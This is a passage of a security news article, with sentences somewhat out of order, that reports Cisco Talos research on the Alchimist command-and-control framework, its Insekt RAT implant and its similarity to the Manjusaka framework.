"Since Alchimist is a single-file based ready-to-go C2 framework, it is difficult to attribute its use to a single actor such as the authors, APTs, or crimeware syndicates." "The distribution and advertising vector for Alchimist is also unknown - underground forums, marketplaces, or open source distribution such as the case for Manjusaka," Talos said. The instructions could then be potentially embedded in a maldoc attached to a phishing email that, when opened, downloads and launches the backdoor on the compromised machine.Īlthough Alchimist has been utilized in a campaign which involved a mix of Insekt RAT and other open source tools for carrying out post-compromise activities, the threat actor's delivery vehicle remains something of a mystery. "It is likely that due to the high proliferation and detection rates of existing frameworks such as Cobalt Strike and Sliver, threat actors are developing and adopting novel tools such as Alchimist that support multiple functionalities and communication protocols."Īlchimist C2 panel further features the ability to generate first stage payloads, including PowerShell and wget code snippets for Windows and Linux, potentially allowing an attacker to flesh out their infection chains to distribute the Insekt RAT binary. "The rise of ready-to-go offensive frameworks such as Manjusaka and Alchimist is an indication of the popularity of post-compromise tools," Talos researchers told The Hacker News. The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another self-contained framework known as Manjusaka, which has been touted as the "Chinese sibling of Sliver and Cobalt Strike."Įven more interestingly, both Manjusaka and Alchimist pack in similar functionalities, despite the differences in the implementation when it comes to the web interfaces.
0 Comments
Leave a Reply. |